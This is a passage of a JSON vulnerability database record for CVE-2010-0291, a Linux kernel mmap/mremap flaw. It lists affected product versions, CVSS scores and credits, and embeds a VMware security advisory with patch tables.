        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.2"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "aura conferencing standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "37906"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.6.32.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Al Viro",
    "sources": [
      {
        "db": "BID",
        "id": "37906"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2010-0291",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.6,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2010-0291",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-42896",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-0291",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201002-150",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42896",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2010-0291",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42896"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0291"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0291"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Linux kernel before 2.6.32.4 allows local users to gain privileges or cause a denial of service (panic) by calling the (1) mmap or (2) mremap function, aka the \"do_mremap() mess\" or \"mremap/mmap mess.\". The Linux kernel is prone to multiple denial-of-service vulnerabilities when mapping memory addresses. \nLocal attackers may leverage these issues to crash the kernel and deny service to legitimate users.  Other attacks may also be possible. \nThese issues have been resolved in the 2.6.32.4 kernel. Linux Kernel is the kernel used by the open source operating system Linux. There is a permissions vulnerability in the Linux kernel. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2011-0003\nSynopsis:          Third party component updates for VMware vCenter\n                   Server, vCenter Update Manager, ESXi and ESX\nIssue date:        2011-02-10\nUpdated on:        2011-02-10 (initial release of advisory)\nCVE numbers:       --- Apache Tomcat ---\n                   CVE-2009-2693 CVE-2009-2901 CVE-2009-2902\n                   CVE-2009-3548 CVE-2010-2227 CVE-2010-1157\n                   --- Apache Tomcat Manager ---\n                   CVE-2010-2928\n                   --- cURL ---\n                   CVE-2010-0734\n                   --- COS Kernel ---\n                   CVE-2010-1084 CVE-2010-2066 CVE-2010-2070\n                   CVE-2010-2226 CVE-2010-2248 CVE-2010-2521\n                   CVE-2010-2524 CVE-2010-0008 CVE-2010-0415\n                   CVE-2010-0437 CVE-2009-4308 CVE-2010-0003\n                   CVE-2010-0007 CVE-2010-0307 CVE-2010-1086\n                   CVE-2010-0410 CVE-2010-0730 CVE-2010-1085\n                   CVE-2010-0291 CVE-2010-0622 CVE-2010-1087\n                   CVE-2010-1173 CVE-2010-1437 CVE-2010-1088\n                   CVE-2010-1187 CVE-2010-1436 CVE-2010-1641\n                   CVE-2010-3081\n                   --- Microsoft SQL Express ---\n                   CVE-2008-5416 CVE-2008-0085 CVE-2008-0086\n                   CVE-2008-0107 CVE-2008-0106\n                   --- OpenSSL ---\n                   CVE-2010-0740 CVE-2010-0433\n                   CVE-2010-3864 CVE-2010-2939\n                   --- Oracle (Sun) JRE ---\n                   CVE-2009-3555 CVE-2010-0082 CVE-2010-0084\n                   CVE-2010-0085 CVE-2010-0087 CVE-2010-0088\n                   CVE-2010-0089 CVE-2010-0090 CVE-2010-0091\n                   CVE-2010-0092 CVE-2010-0093 CVE-2010-0094\n                   CVE-2010-0095 CVE-2010-0837 CVE-2010-0838\n                   CVE-2010-0839 CVE-2010-0840 CVE-2010-0841\n                   CVE-2010-0842 CVE-2010-0843 CVE-2010-0844\n                   CVE-2010-0845 CVE-2010-0846 CVE-2010-0847\n                   CVE-2010-0848 CVE-2010-0849 CVE-2010-0850\n                   CVE-2010-0886 CVE-2010-3556 CVE-2010-3566\n                   CVE-2010-3567 CVE-2010-3550 CVE-2010-3561\n                   CVE-2010-3573 CVE-2010-3565 CVE-2010-3568\n                   CVE-2010-3569 CVE-2010-1321 CVE-2010-3548\n                   CVE-2010-3551 CVE-2010-3562 CVE-2010-3571\n                   CVE-2010-3554 CVE-2010-3559 CVE-2010-3572\n                   CVE-2010-3553 CVE-2010-3549 CVE-2010-3557\n                   CVE-2010-3541 CVE-2010-3574\n                   --- pam_krb5 ---\n                   CVE-2008-3825 CVE-2009-1384\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere\n   Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues. \n\n\n2. Relevant releases\n\n   vCenter Server 4.1 without Update 1,\n\n   vCenter Update Manager 4.1 without Update 1,\n\n   ESXi 4.1 without patch ESXi410-201101201-SG,\n\n   ESX 4.1 without patch ESX410-201101201-SG. \n\n\n3. Problem Description\n\n a. vCenter Server and vCenter Update Manager update Microsoft\n    SQL Server 2005 Express Edition to Service Pack 3\n\n    Microsoft SQL Server 2005 Express Edition (SQL Express)\n    distributed with vCenter Server 4.1 Update 1 and vCenter Update\n    Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2\n    to SQL Express Service Pack 3, to address multiple security\n    issues that exist in the earlier releases of Microsoft SQL Express. \n\n    Customers using other database solutions need not update for\n    these issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,\n    CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL\n    Express Service Pack 3. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * Hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. vCenter Apache Tomcat Management Application Credential Disclosure\n\n    The Apache Tomcat Manager application configuration file contains\n    logon credentials that can be read by unprivileged local users. \n\n    The issue is resolved by removing the Manager application in\n    vCenter 4.1 Update 1. \n\n    If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon\n    credentials are not present in the configuration file after the\n    update. \n\n    VMware would like to thank Claudio Criscione of Secure Networking\n    for reporting this issue to us. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-2928 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not affected\n    VirtualCenter  2.5       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version\n    1.6.0_21\n\n    Oracle (Sun) JRE update to version 1.6.0_21, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,\n    CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,\n    CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,\n    CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,\n    CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,\n    CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,\n    CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,\n    CVE-2010-0850. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following name to the security issue fixed in\n    Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not applicable **\n    VirtualCenter  2.5       Windows  not applicable **\n\n    Update Manager 4.1       Windows  not applicable **\n    Update Manager 4.0       Windows  not applicable **\n    Update Manager 1.0       Windows  not applicable **\n\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not applicable **\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.5.0 family\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version\n   1.5.0_26\n\n    Oracle (Sun) JRE update to version 1.5.0_26, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,\n    CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,\n    CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,\n    CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,\n    CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,\n    CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,\n    CVE-2010-3574. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  not applicable **\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      not applicable **\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, no patch planned\n    ESX            3.0.3     ESX      affected, no patch planned\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.6.0 family\n\n e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n    Apache Tomcat updated to version 6.0.28, which addresses multiple\n    security issues that existed in earlier releases of Apache Tomcat\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i\n    and CVE-2009-3548. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  not applicable **\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Apache Tomcat 5.5 family\n\n f. vCenter Server third party component OpenSSL updated to version\n    0.9.8n\n\n    The version of the OpenSSL library in vCenter Server is updated to\n    0.9.8n. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-0740 and CVE-2010-0433 to the\n    issues addressed in this version of OpenSSL. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE,  Fusion. \n\n g. ESX third party component OpenSSL updated to version 0.9.8p\n\n    The version of the ESX OpenSSL library is updated to 0.9.8p. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-3864 and CVE-2010-2939 to the\n    issues addressed in this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n h. ESXi third party component cURL updated\n\n    The version of cURL library in ESXi is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2010-0734 to the issues addressed in\n    this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n i. ESX third party component pam_krb5 updated\n\n    The version of pam_krb5 library is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-3825 and CVE-2009-1384 to the\n    issues addressed in the update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n\n  * hosted products are VMware Workstation, 